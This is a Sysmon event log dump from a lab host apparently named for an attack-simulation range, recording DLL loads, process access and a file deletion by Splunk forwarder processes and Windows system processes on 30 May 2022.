13:05:51.982{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 10341000x8000000000000000100301Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.982{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x8000000000000000100300Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.982{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x8000000000000000100299Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.982{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 23542300x8000000000000000100298Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.982{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4586EFE84E504E44345AB6EAD6C742E2,SHA256=7B6ADB1C78A48055ED986F30F0D5D7CE638FD17F48F91A8E60FD7B496A02288E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x8000000000000000100297Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.982{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x8000000000000000100296Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.982{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exeMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9trueSplunk, Inc.Valid 10341000x8000000000000000100295Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.982{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100294Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.982{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100293Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.982{326FD73D-A252-6294-0500-000000005502}416432C:\Windows\system32\csrss.exe{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000100292Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.982{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100291Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.982{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100290Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.982{326FD73D-A44C-6294-0501-000000005502}51646008C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000100289Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.983{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{326FD73D-A253-6294-E703-000000000000}0x3e70SystemMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 734700x8000000000000000100288Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.404{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 10341000x8000000000000000100287Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.404{326FD73D-C12F-6294-440B-000000005502}45601160C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x8000000000000000100286Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.404{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2EtrueMicrosoft WindowsValid 734700x8000000000000000100285Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.404{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBEtrueMicrosoft WindowsValid 734700x8000000000000000100284Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.232{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4trueMicrosoft WindowsValid 734700x8000000000000000100283Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.232{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686trueMicrosoft WindowsValid 734700x8000000000000000100282Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.232{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid 734700x8000000000000000100281Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.232{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid 734700x8000000000000000100280Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.232{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238DtrueMicrosoft WindowsValid 734700x8000000000000000100279Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.232{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03trueMicrosoft WindowsValid 734700x8000000000000000100278Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.232{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578trueMicrosoft WindowsValid 734700x8000000000000000100277Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.232{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0trueMicrosoft WindowsValid 734700x8000000000000000100276Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.217{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DDtrueMicrosoft CorporationValid 734700x8000000000000000100275Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.217{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 734700x8000000000000000100274Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.217{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 734700x8000000000000000100273Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.217{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x8000000000000000100272Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.217{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x8000000000000000100271Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.217{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 734700x8000000000000000100270Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.217{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\Wldap32.dll10.0.14393.5125 (rs1_release.220429-1732)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799trueMicrosoft WindowsValid 734700x8000000000000000100269Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.217{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x8000000000000000100268Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.217{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761trueMicrosoft WindowsValid 734700x8000000000000000100267Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.217{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x8000000000000000100266Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.217{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 734700x8000000000000000100265Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.217{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7EtrueMicrosoft CorporationValid 734700x8000000000000000100264Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.217{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 734700x8000000000000000100263Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.217{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® 